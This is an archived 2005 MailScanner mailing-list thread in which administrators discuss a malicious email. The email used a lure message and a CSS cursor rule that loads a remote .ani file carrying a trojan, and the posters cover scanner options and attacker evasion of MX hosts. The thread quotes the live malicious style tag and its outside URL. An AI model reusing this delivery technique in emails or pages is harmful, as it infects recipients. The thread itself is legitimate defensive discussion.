Virus in HTML Email Style Sheet

Julian Field MailScanner at ecs.soton.ac.uk
Tue Mar 29 17:26:09 IST 2005 

    [ The following text is in the "ISO-8859-1" character set. ]
    [ Your display is set for the "US-ASCII" character set.  ]
    [ Some characters may be displayed incorrectly. ]

Rick Cooper wrote:

>>-----Original Message-----
>>From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
>>Behalf Of Derek Winkler
>>Sent: Tuesday, March 29, 2005 9:24 AM
>>To: MAILSCANNER at JISCMAIL.AC.UK
>>Subject: Virus in HTML Email Style Sheet
>>
>>
>>Here's the HTML source for a message that had a virus in it...
>>
>>Hey Love<br>I reserved us a place at huoston's tonight.<br>starting to be
>>hungry already, for you!!<br>Bob
>><br><br><br><br>
>><style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}</style>
>>
>>When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
>>
>>MailScanner did not catch this.
>>
>>Should there be a disarm URLs in style sheets setting in MailScanner?
>>
>>Does anyone know of a virus scanner that checks URLs in email as well? I
>>thought Clam was doing this.
>>
>>Thanks,
>>
>>Derek
>>
>>
>>
>>
>
>Clam does, if it's configured with --with-libcurl and the MailFollowURLs
>option is set in the config file.
>To use this feature in the ClamAVModule the bit mask would have to include
>Mail::ClamAV::CL_SCAN_MAILURL() and it currently does not. There are obvious
>potential DOS problems with this, but I guess the question would be do
>enough people want it to warrant Julian adding yet another config option?
>One would have to use it with care because it would certainly increase the
>server load significantly as it would retrieve any file pointed to by any
>url link and then scan it.
>
>
Doing this on any machine other than the final client is pretty
pointless. It's easy to configure Apache to send one file to one
machine, and a different file to other machines. The virus writers get a
GET request from an IP address. Is this an MX host of the domain they
just sent the message to? If so, send an empty file or a safe file. Not
an MX? Then send a virus.

This is the same reason MailScanner rejects messages with external bodies.

How do I detect URLs inside <STYLE>.....</STYLE> tags?

--
Julian Field
www.MailScanner.info
Buy the MailScanner book at www.MailScanner.info/store
Professional Support Services at www.MailScanner.biz
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654

------------------------ MailScanner list ------------------------
To unsubscribe, email jiscmail at jiscmail.ac.uk with the words:
'leave mailscanner' in the body of the email.
Before posting, read the MAQ (http://www.mailscanner.biz/maq/) and
the archives (http://www.jiscmail.ac.uk/lists/mailscanner.html).

Support MailScanner development - buy the book off the website!

More information about the MailScanner mailing list